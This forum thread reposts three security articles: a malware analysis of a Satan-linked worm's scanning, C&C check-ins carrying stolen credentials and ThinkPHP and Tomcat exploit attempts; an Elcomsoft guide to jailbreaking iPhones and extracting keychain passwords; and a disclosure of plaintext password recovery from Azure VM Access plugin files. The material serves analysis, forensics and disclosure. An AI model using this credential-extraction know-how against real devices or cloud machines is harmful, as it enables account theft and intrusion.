    The first two servers belong to Microsoft and Akamai and are clean traffic, Windows-related. Then comes the malware traffic itself – one to an IP address in Malaysia, probably command and control (C&C) traffic, the rest targeting consecutive IP addresses in China, part of the worming behavior. Up next, a long list of private IP addresses with little traffic – failed scans since these hosts did not exist in our local network. Note that our sandbox isn’t configured with the 192.168.0.0 network address, so it seems that the sample doesn’t rely solely on the existing interfaces but also on a hard-coded network range to be scanned.

    The sample scans for an impressive number of open ports on the hosts in both the local network and in the greater Internet. The ports attempted seem to be the same for both types of hosts.

    7

    Figure 7 - Extract from the ports scanned for one LAN IP

    Interesting ports that seem to be targeted include SSH, RDP, SMB, HTTP and many others.

    8

    Figure 8 - Unsuccessful attempts to connect to RDP and SMB on hosts

    COMMAND AND CONTROL TRAFFIC

    The sample connects to an IP address in Malaysia for C&C, first sending a login request.

    9

    Figure 9 - C&C check-in

    The request comes with a “hash” and a “url” parameter, both of which are hex strings. The “hash” parameter is likely used to identify the host. The “url” parameter is a string that was Base64 encoded and then hex-encoded. Decoding it reveals that the malware is checking in the Administrator credentials that were stolen using Mimikatz.

    10

    Figure 10 - Decoding checked in data – URL parameter

    Then comes another request that returns the beginning of an internet IP address range to try to spread to:

    11

    Figure 11 - Receiving a target IP range to exploit from C&C

    From this point on, the malware starts scanning said network address. It periodically checks in interesting information to the C&C server – for example, after it’s identified a server that is up, it checks in the location data – where to find the web server and what the title page is.

    12

    Figure 12 - Sending data on discovering network host up

    13

    Figure 13 - Decoding URL parameter, letting the C&C server know of discovered web server

    14

    Figure 14 - Decoding Title parameter, which sends the page title of the web server response

    EXPLOITATION AND POST-EXPLOITATION

    The binary attempts different exploit methods depending on open ports. For HTTP, for example, it attempts to access different pages – most to check if a vulnerability exists, but some of them with overt RCE attempts. One such example, an exploit against ThinkPHP that Sucuri previously reported as being used in-the-wild.

    15

    Figure 15 - ThinkPHP Exploit Attempt

    There is a minor difference in the payload than what Sucuri has reported – this attacker attempts to execute “netstat -an” on the machine to get network info, in the Sucuri report “uname” is used as an RCE test instead. Our honeypots have detected the Sucuri payload every day, so it seems that the attempts come from different attackers targeting the same exploit.

    Another complete exploit comes for the Apache Tomcat platform, CVE-2017-12615. The attacker attempts to upload a snippet of piece of JSP code that they can then execute via GET request:

    16

    Figure 16 - CVE-2017-12615 attempt to upload JSP code to server

    The name “satan.jsp” is a good hint of who this malware really is. In December of 2018, NSFocus blogged about the actors behind Satan ransomware using a self-replicating worm component that would then download ransomware or a cryptocoin miner onto the exploited machines. The reported exploitation methods include a list of web application vulnerabilities that are very similar to the sample at hand – the two ThinkPHP vulnerabilities seeming to be the only ones missing from the original report. The behavior they reported also include SSH bruteforcing, ETERNALBLUE and DOUBLEPULSAR against SMB-capable hosts. It seems that we have identified our threat actor.

    17

    Figure 17 - JSP shell code that downloads a binary from a web server depending on platform

    The JSP code downloads an executable from the remote server, fast.exe, on Windows platforms, as well as a bash script on Linux platforms. It then executes the payload. The names involved in the script and JSP shell, “fast.exe”, “ft32”, “ft64”, “.loop” are similar to what NSFocus reported.

    Similar to the NSFocus report, the “ft*” and “fast.exe” are simple downloaders for the rest of the modules. “ft” contains a list of C&C servers to contact, in this case all of them in the same network range:

    18

    Figure 18 - String view of the "ft32" source code, which shows hints of persistence using Cron as well as C&C IP addresses

    Paths towards all the different malware components to be downloaded are available – conn32 and conn64, cry32, cry64 and so on. Linux binaries are UPX-compressed and Windows ones us PECompact2. In short, on successful exploitation, the downloader module is installed on the machine and it, subsequently, tries to contact a C&C server, pull the different components on the box and then start spreading, encrypting, mining or a combination of them, depending upon the malware author’s will. For a more detailed analysis, check out the NSFocus report mentioned above.

    RESOLVING THE ETHICAL DILEMMA

    The execution of this malware in our sandbox was mostly unrestricted. As a result, we were able to observe C&C communications and create a good signature. However, this is just what the threat actor desires – people executing his malware to spread it further. As a result, we’ve taken some precautions to limit the maximum amount of damage that sandboxing such samples can do – for example, not using any URLs accessed by these samples for our web crawler since that might lead us to re-executing exploits against innocent websites. Unfortunately, these steps are not perfect as we’ll always have to find balance between how much we allow and limit.

    CONCLUSION

    This is an example of the work that goes about when identifying an interesting binary. The work is not limited to simply classifying the malicious behavior but comprises other things as well – identifying ways of detecting the malware via local or network means, correlating information with known sources to validate our research as well as improve the current public knowledge of threat actors and their tools, improving our crawling ability to discover threats as quickly as possible as well as, in this case, making sure that our products are able to use all of this intelligence. 

    Analysis of this binary also revealed a few gaps in our honeypot tracking and exploit traffic simulation capabilities which we are actively working on – deploying honeypot improvements and creating new strikes. BreakingPoint customers already have access to most of the exploits identified during the analysis of this binary – strikes for ETERNALBLUE, Struts S2-045 and S2-047 and other vulnerabilities. ThreatARMOR and visibility customers with an ATI subscription benefit from these detections as well with C&C addresses now being identified and most of the exploits having been tracked by our honeypots for a good amount of time now. 

    LEVERAGE SUBSCRIPTION SERVICE TO STAY AHEAD OF ATTACKS

    The Ixia BreakingPoint Application and Threat Intelligence (ATI) Subscription provides bi-weekly updates of the latest application protocols and attacks for use with Ixia platforms.

     

    Sursa: https://www.ixiacom.com/company/blog/dynamic-analysis-windows-malicious-self-propagating-binary

  23. Step by Step Guide to iOS Jailbreaking and Physical Acquisition

    May 30th, 2019 by Oleg Afonin
     
     

    Unless you’re using GrayShift or Cellebrite services for iPhone extraction, jailbreaking is a required pre-requisite for physical acquisition. Physical access offers numerous benefits over other types of extraction; as a result, jailbreaking is in demand among experts and forensic specialists.

    The procedure of installing a jailbreak for the purpose of physical extraction is vastly different from jailbreaking for research or other purposes. In particular, forensic experts are struggling to keep devices offline in order to prevent data leaks, unwanted synchronization and issues with remote device management that may remotely block or erase the device. While there is no lack of jailbreaking guides and manuals for “general” jailbreaking, installing a jailbreak for the purpose of physical acquisition has multiple forensic implications and some important precautions.

    When performing forensic extraction of an iOS device, we recommend the following procedure.

     

    Prepare the device and perform logical extraction

    1. Enable Airplane mode on the device.

      This is required in order to isolate the device from wireless networks and cut off Internet connectivity.
    2. Verify that Wi-Fi, Bluetooth and Mobile Data toggles are all switched off.

      Recent versions of iOS allow keeping (or manually toggling) Wi-Fi and Bluetooth connectivity even after Airplane mode is activated. This allows iOS devices to keep connectivity with the Apple Watch, wireless headphones and other accessories. Since we don’t want any of that during the extraction, we’ll need to make sure all of these connectivity options are disabled.
    3. Unlock the device. Do not remove the passcode.While you could switch the device into Airplane mode without unlocking the phone, the rest of the process will require the device with its screen unlocked. While some jailbreaking and acquisition guides (including our own old guides) may recommend you to remove the passcode, don’t. Removing the passcode makes iOS erase certain types of data such as Apple Pay transactions, downloaded Exchange mail and some other bits and pieces. Do not remove the passcode.
    4. Pair the device to your computer by establishing trust (note: passcode required!)Since iOS 11, iOS devices require the passcode in order to establish pairing relationship with the computer. This means that you will require the passcode in order to pair the iPhone to your computer. Without pairing, you won’t be able to sideload the jailbreak IPA onto the phone.
    5. Make sure that your computer’s Wi-Fi is disabled. This required step is frequently forgotten, resulting in a failed extraction.While it is not immediately obvious, we strongly recommend disabling Wi-Fi connectivity on your computer if it has one. If you keep Wi-Fi enabled on your computer and there is another iOS device on the network, iOS Forensic Toolkit may accidentally connect to that other device, and the extraction will fail.
    6. Launch iOS Forensic Toolkit.Make sure that both the iPhone and the license dongle are connected to your computer’s USB ports. iOS Forensic Toolkit is available from https://www.elcomsoft.com/eift.html
    7. Using iOS Forensic Toolkit, perform all steps for logical acquisition.iOS Forensic Toolkit supports what is frequently referred as “Advanced Logical Extraction”. During this process, you will make a fresh local backup, obtain device information (hardware, iOS version, list of installed applications), extract crash logs, media files, and shared app data. If the iOS device does not have a backup password, iOS Forensic Toolkit will set a temporarily password of ‘123’ in order to allow access to certain types of data (e.g. messages and keychain items).If a backup password is configured and you don’t know it, you may be able to reset the backup password on the device (iOS 11 and 12: the Reset All Settings command; passcode required), then repeat the procedure. However, since the Reset All Settings command also removes device passcode, you will lose access to Apple Pay transactions and some other data. Refer to “If you have to reset the backup password” for instructions.

    Prepare for jailbreaking and install a jailbreak

    1. Identify hardware and iOS version the device is running (iOS Forensic Toolkit > (I)nformation).
    2. Identify the correct jailbreak supporting the combination of device hardware and software.The following jailbreaks are available for recent versions of iOS:iOS 12 – 12.1.2
      RootlessJB (recommended if compatible with hardware/iOS version as the least invasive): https://github.com/jakeajames/rootlessJBiOS 11.x – 12 – 12.1.2
      unc0ver jailbreak (source code available): https://github.com/pwn20wndstuff/Undecimus

       

      iOS 12 – 12.1.2
      Chimera jailbreak: https://chimera.sh/

      Other jailbreaks exist. They may or may not work for the purpose of forensic extraction.

    3. Make sure you have an Apple Account that is registered in the Apple Developer Program (enrollment as a developer carries a yearly fee).Using an Apple Account enrolled in the Apple Developer Program allows sideloading an IPA while the device is offline and without manually approving the signing certificate in the device settings (which requires the device to connect to an Apple server).Note: a “personal” developer account is not sufficient for our purposes; you require a “corporate” developer account instead.
    4. Log in to your developer Apple Account and create an app-specific password.All Apple accounts enrolled in the Apple Developer Program are required to have Two-Factor Authentication. Since Cydia Impactor does not support two-factor authentication, an app-specific password is required to sign and sideload the jailbreak IPA.
    5. Launch Cydia Impactor and sideload the jailbreak IPA using the Apple ID and app-specific password of your Apple developer account.Note: Cydia will prompt about which signing certificate to use. Select the developer certificate from the list. Since you have signed the IPA file using your developer account, approving the signing certificate on the iOS device is not required. The iOS device will remain offline.
    6. Launch the jailbreak and follow the instructions. Note: we recommend creating a system snapshot if one is offered by the jailbreak.

    Troubleshooting jailbreaks

    Modern jailbreaks (targeting iOS 10 and newer) are relatively safe to use since they are not modifying the kernel. As a result, the jailbroken device will always boot in non-jailbroken state; a jailbreak must be reapplied after each reboot.

    Jailbreaks exploit chains of vulnerabilities in the operating system in order to obtain superuser privileges, escape the sandbox and allow the execution of unsigned applications. Since multiple vulnerabilities are consecutively exploited, the jailbreaking process may fail at any time.

    It is not unusual for jailbreaking attempts to fail from the first try. If the first attempt fails, you have the following options:

    1. Reattempt the jailbreak by re-running the jailbreak app.
    2. If this fails, reboot the device, unlock it with a passcode then wait for about 3 minutes to allow all background processes to start. Then reattempt the jailbreak.
    3. You may need to repeat Step 2 several times for the jailbreak to install. However, if the above procedure does not work after multiple attempts, we recommend trying a different jailbreak tool. For example, we counted no less than five different jailbreak tools for iOS 12.0-12.1.2, with some of them offering higher success rate on certain hardware (and vice versa).
    4. Some jailbreaks have specific requirements such as checking if an iOS update has been downloaded (and removing the downloaded update if it is there). Do check accompanying info.

    Troubleshooting iOS Forensic Toolkit

    If for any reason you have to close and restart iOS Forensic Toolkit, make sure to close the second window as well (the Secure channel window).

    If iOS Forensic Toolkit appears to be connected to the device but you receive unexpected results, close iOS Forensic Toolkit (both windows) and make sure that your computer is not connected to the Wi-Fi network. If it isn’t, try disabling the wired network connection as well since your computer may be operating on the same network with other iOS devices.

    Windows: the Windows version of iOS Forensic Toolkit will attempt to save extracted information to the folder where the tool is installed. While you can specify your own path to store data, it may be easier to move EIFT installation into a shorter path (e.g. x:\eift\).

    Mac: a common mistake is attempting to run iOS Forensic Toolkit directly from the mounted DMG image. Instead, create a local directory and copy EIFT to that location.

    If you have to reset the backup password

    If the iPhone backup is protected with an unknown password, you may be tempted to quickly reset that password by using the “Reset All Settings” command. We recommend using this option with care, and only after making a full local backup “as is”.

    Resetting “all settings” will also remove the device passcode, which means that iOS will wipe the types of data that rely on passcode protection. This includes Apple Pay transactions, downloaded Exchange messages and some other data. In order to preserve all of that evidence, we recommend the following acquisition sequence:

    1. Perform the complete logical acquisition sequence “as is” with iOS Forensic Toolkit (the backup, media files, crash logs, shared app data).
    2. Jailbreak the device and capture the keychain and file system image. If this is successful, the keychain will contain the backup password.
    3. Reset backup password: if you are unable to install a jailbreak and perform physical acquisition even after you follow the relevant troubleshooting steps, consider resetting the backup password and following logical acquisition steps again to capture the backup. Note that if you create the backup with iOS Forensic Toolkit after resetting the password, that backup will be protected with a temporary password of ‘123’.

    Extracting the backup password from the keychain

    If you have successfully performed physical acquisition, you already have the decrypted iOS keychain at your disposal. The keychain stores the backup password; you can use that backup password to decrypt the device backup. The backup password is stored in the “BackupAgent” item as shown on the following screen shot:

    backup_pass.png

    On that screen shot, the backup password is “JohnDoe”.

    To discover that password, launch Elcomsoft Phone Breaker and select Explore keychain on the main screen. Click “Browse” > “Choose another” and specify path to the keychaindumpo.xml file extracted with iOS Forensic Toolkit.

    The keychain is always encrypted. The backup password is stored ThisDeviceOnly attribute, and can only be extracted via physical acquisition.

    Perform physical extraction

    Once the device has been jailbroken, it will be possible to extract the content of the file system, obtain and decrypt the keychain.

    1. Make sure that the iOS device remains in Airplane mode, and Wi-Fi, Bluetooth and Mobile data toggles are disabled.
    2. Make sure that your computer’s Wi-Fi is disabled. This required step is frequently forgotten, resulting in a failed extraction.While it is not immediately obvious, we strongly recommend disabling Wi-Fi connectivity on your computer if it has one. If you keep Wi-Fi enabled on your computer and there is another iOS device on the network, iOS Forensic Toolkit may accidentally connect to that other device, and the extraction will fail.
    3. Make sure the iOS device has been paired to the computer (or that you have a valid pairing/lockdown file ready).
    4. Unlock iOS device and make sure its display is switched on. Connect the iOS device to the computer. Note: do not remove the passcode on the device! Otherwise, you will lose access to certain types of evidence such as Apple Pay transactions, downloaded Exchange mail and some other data.
    5. Launch iOS Forensic Toolkit.
    6. Use the (D)isable screen lock command from the main window to prevent the iOS device from automatically locking.This is required in order to access some elements of the file system that iOS tries to protect when the device is locked. Preventing screen lock is the simplest way to work around these protection measures.
    7. Extract the keychain (K)eychain.
    8. Extract file system image (F)ile system.

    Analyzing the data

    As a result of your acquisition efforts, you may have all or some of the following pieces of evidence:

    1. Information about the device (XML) and the list of installed apps (text file). Use any XML or text viewer to analyze.
    2. A local backup in iTunes format. If you have followed the guideline, the backup will be encrypted with a password, and the password is ‘123’. You can open the backup in any forensic tool that supports iTunes backups such as Elcomsoft Phone Viewer. In order to analyze the keychain, you’ll have to open the backup with Elcomsoft Phone Breaker.
    3. Crash logs. You can analyze these using a text editor. Alternatively, refer to the following work about log file analysys: iOS Sysdiagnose Research (scripts: iOS sysdiagnose forensic scripts).
    4. Media files. Use any gallery or photo viewer app. You may want to use a tool that can extract EXIF information and, particularly, the geotags in order to re-create the suspect’s location history. The article iOS Photos.sqlite Forensics is also worth reading!
    5. Shared files. These files can be in any format, most commonly plist, XML or SQLite.
    6. Keychain (extracted with iOS Forensic Toolkit). Analyze with Elcomsoft Phone Breaker. The keychain contains passwords the user saved in Safari, system and third-party apps. These passwords can be used to sign in to the user’s mail and social network accounts. The passwords can be also used to create a highly targeted custom dictionary for attacking encrypted documents and full disk encryption with tools such as Elcomsoft Distributed Password Recovery.
    7. File system image (extracted with iOS Forensic Toolkit). Analyze with Elcomsoft Phone Viewer or unpack the TAR file and analyze manually or using your favorite forensic tool.

     

    Sursa: https://blog.elcomsoft.com/2019/05/step-by-step-guide-to-ios-jailbreaking-and-physical-acquisition/

  24. March 19, 2018BY image-12-80x80.pngDANIEL GOLDBERG AND 76b8040c60d7e22e58edb45863de4cd7?s=96&d=OFRI ZIV3 COMMENTS

    Azure provides an incredible amount of add-on services for its IaaS offerings. These services are provided by the Azure Guest Agent through a large collection of plugins such as Chef integration, a Jenkins interface, a diagnostic channel for apps running inside the machine and many more. While researching the Azure Guest Agent, we’ve uncovered several security issues which have all been reported to Microsoft. This post will focus on a security design flaw in the VM Access plugin that may enable a cross platform attack impacting every machine type provided by Azure.

     

     

    Simply put, attackers can recover plaintext administrator passwords from machines by abusing the VM Access plugin. These may be reused to access different services, machines and databases. Keeping plaintext credentials can also violate key compliance regulations such as PCI-DSS and others. Microsoft has dismissed this issue and replied as follows : “…the way the agent & extension handlers work is by design.”

    In this post, we’ll cover the technical details of how the VM Access plugin works and how we managed to abuse this design flaw to recover “secure”plaintext data. Mitigation for this issue will also be discussed.

    The Azure VM Access plugin

    One of the many plugins Azure provides is VM Access, a plugin that helps recover access to machines that users have been inadvertently locked out from accessing. This can be the result of mistakes while configuring the machine or because the login credentials have been forgotten. Azure allows users to reset both the machine configuration and the password of any local user.

    Due to the sensitive nature of credentials handling, we decided to take a closer look at this plugin. Password credentials are a valuable target for attackers, as credential reuse is a constant thorn in many organisations security posture. In recent Windows releases, credential storage has been repeatedly hardened and since Windows 8.1 and Windows Server 2012, Windows hasn’t been keeping plaintext passwords at all. Plaintext passwords are even more valuable for attackers as even minor manipulations on passwords can open multiple doors.

    We’ve discovered that since late 2015, attackers have been able to recover plaintext credentials after breaching and take over an Azure virtual machine if the VM Access plugin was used at any point on that machine.

    Let’s take a quick look at the Azure Guest Agent and assemble the pieces to understand how the plaintext password can be extracted.

    How the Azure Guest Agent works

    Azure offers a rich plugin system enabling developers and administrators to interact with virtual machines. The core of this functionality is a cross platform agent, built into every marketplace that provides virtual machine images. This agent is a background service that continually communicates with a controller (part of the Azure infrastructure), receives tasks to execute, performs them and reports back.

    At the highest level, the administrator, using the Azure portal or API, provides an operation to be executed on the guest virtual machine. The Azure infrastructure then provides the Guest Agent the requested configuration and if required, the plugin to execute it. For example, if the administrator wants to collect specific diagnostics from a machine, Azure provides a plugin package named IaaSDiagnostics and a configuration file with the parameters encoded inside.

    azure_password_recovery

    Plugin Configuration Files

    The communication between the controller and the Guest Agent occurs over plain HTTP and an XML based protocol. Each configuration is transmitted as a JSON data structure wrapped in XML and only the raw JSON is stored on disk. The JSON format is identical across all the extensions and is similar to the following data (taken from an VMAccess configuration, version 2.4.2) –

    azure

    This data is saved in: C:PackagesPlugins<PluginName>RuntimeSettings

    This folder is readable by any user but writable only by administrators. For example, the configuration file above was saved in :

    C:PackagesPluginsMicrosoft.Compute.VMAccessAgent2.4.2RuntimeSettings.settings

    From our perspective, the important part of this configuration file is the sensitive data (such as passwords), which is encrypted and encoded as a Base64 string and stored in protectedSettings.

    The sensitive data is encrypted using a certificate generated for communication between the Guest Agent and Azure, given to Azure by the Guest Agent. To read the data encrypted by Azure, the plugin decodes the Base64 data and using the certificate specified by the thumbprint, decrypts the content. On Windows this certificate is saved in the registry under HKLM/Software/Microsoft/SystemCertificates accessible only to administrators and the operating system itself.

    Recovering Plaintext Data

    Now we have all the ingredients needed to recover plaintext data. The new password, provided by the administrator through the Azure portal, is saved in the protectedSettings section in the configuration file that was passed to the Guest Agent running on the guest machine. This file is saved to disk containing the new password as a plaintext string first encrypted then base64 encoded.

    azure_password_recovery

    Once an attacker breaches a machine and successfully escalates privileges,  any certificate stored on the machine can be accessed. At that point, all that’s required is reading the base64 encrypted data, finding the certificate using the supplied thumbprint and ta-da – the data is successfully recovered. Here’s some simple C# code to decode this data using available Microsoft APIs:

    azure_password_recovery

    Compiling this code with a small wrapping will easily recover passwords in Windows. In Linux the vulnerability is the same and the data can be extracted with a few shell commands running as root.

    azure_password_recovery

    Successful execution on a Linux machine

    For an attacker to successfully execute this attack, two conditions are required:

    • The VM Access plugin must be used to reset a user’s password.
    • A method to read the certificate file using root/administrator permissions.

    While privilege escalation may not be trivial, reports about escalation methods are published from time to time. For example, nearly a year ago Microsoft closed a trivial privilege escalation in the Azure Guest Agent on Windows that could give attackers full control of the victim’s system. We’ll have more on this in our next post.

    Bypassing defenses as if they don’t exist

    A key effort in the past few years is ensuring that even if attackers compromise a machine, they cannot easily recover passwords or use any stored credentials. This is crucial as one of the most common methods to propagate across networks is stealing and reusing credentials. Every operating system provides this guarantee in a different fashion, but at bare minimum this consists of storing only password hashes. In addition, storing plain passwords is forbidden by many compliance standards, such as the PCI and SWIFT.

    When it comes to Windows protection, Microsoft has put  great efforts into hardening credential storage in Windows and thwarting credential stealing and other attacks – such as Pass the Hash, weaponised by Mimikatz. Over multiple Windows releases, the password storage has been hardened, culminating in Credential Guard – introduced in Windows 10.

    With the VM Access plugin, none of this hardening is relevant.

    Diagnosis and Mitigation

    Based on the code provided above, we wrote a diagnostic tool (code available on Github, binary available here) to help check which plaintext credentials are stored on an Azure Windows machine. The tool checks for existing VM Access configuration files and if any exists, it displays the recovered credentials. Run the program inside an Administrator command prompt like in the following example:

    password recovery Windows

    Result of a successful recovery

    If you’ve ever used the VM Access plugin, we recommend that you consider the password to be compromised and change it, without using the plugin. If possible, avoid using the VM Access plugin to reset VM passwords.

    If you still prefer using the plugin we suggest deleting the configuration files under

    C:PackagesPluginsMicrosoft.Compute.VmAccessAgentRuntimeSettings

    after the plugin has finished running, to minimise the time the passwords are written to disk. A sample powershell command could be

    rm -Recurse -Force C:PackagesPluginsMicrosoft.Compute.VmAccessAgent2.4.2RuntimeSettings*.settings

    The equivalent shell command in Linux is

    sudo rm -f /var/lib/waagent/Microsoft.OSTCExtensions.VMAccessForLinux-1.4.7.1/config

    Summary

    Using this design flaw, an attacker can bypass modern security controls quite easily. An attacker with privileged access to a locked down Windows Server 2016 machine with Credential Guard installed can acquire the plaintext password of an administrator user within a few seconds. This is made possible simply because the Password Recovery mechanism was used, a mechanism delivered by none other than… Azure. An attacker can then attempt to move laterally across the network through password reuse (a common problem with many organizations) and take over additional services.

    While this attack requires high privileges, privilege escalation vulnerabilities are routinely discovered. We will show an attack leveraging the Azure Guest Agent in a future post.

    Lastly, our only reply to Microsoft’s claim of “by design” is why store passwords using reversible encryption in 2018?

    More on the implications of the attack and how the Infection Monkey can help, read here.

     

    Sursa: https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/

×
×
  • Create New...